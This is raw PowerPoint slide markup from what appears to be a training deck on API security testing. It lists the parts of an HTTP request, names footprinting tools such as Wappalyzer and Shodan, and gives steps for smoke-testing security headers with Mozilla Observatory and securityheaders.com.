              </a:rPr>
              <a:t>HTTP PROTOCOL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BASE URL/HOST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>END POINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QUERY PARAMETERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REQUEST BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AUTHORIZATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COOKIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35926310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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AD9E43F5-9E41-4798-94B9-1DD43DD68476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192058" y="138113"/>
            <a:ext cx="6962775" cy="4676775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416643585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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243903"/>
            <a:ext cx="10058400" cy="1232471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Foot Print details of any web application or REST API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shodan [port number, reverse IP mapping to domain name]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190348474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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Headers Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mozilla Observatory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356999937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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smoke Test Security Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Launch the below tool on any browser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://observatory.allizom.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input a RESTful API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan the API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe the test results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generate API smoke security test report from the 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party tests tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss with Developer on the test results and fixes needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189547599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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smoke Test API Headers Security Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Launch the below tool on any browser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://securityheaders.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input a RESTful API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan the API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe the test results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss with Developer on the test results and fixes needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249884497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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
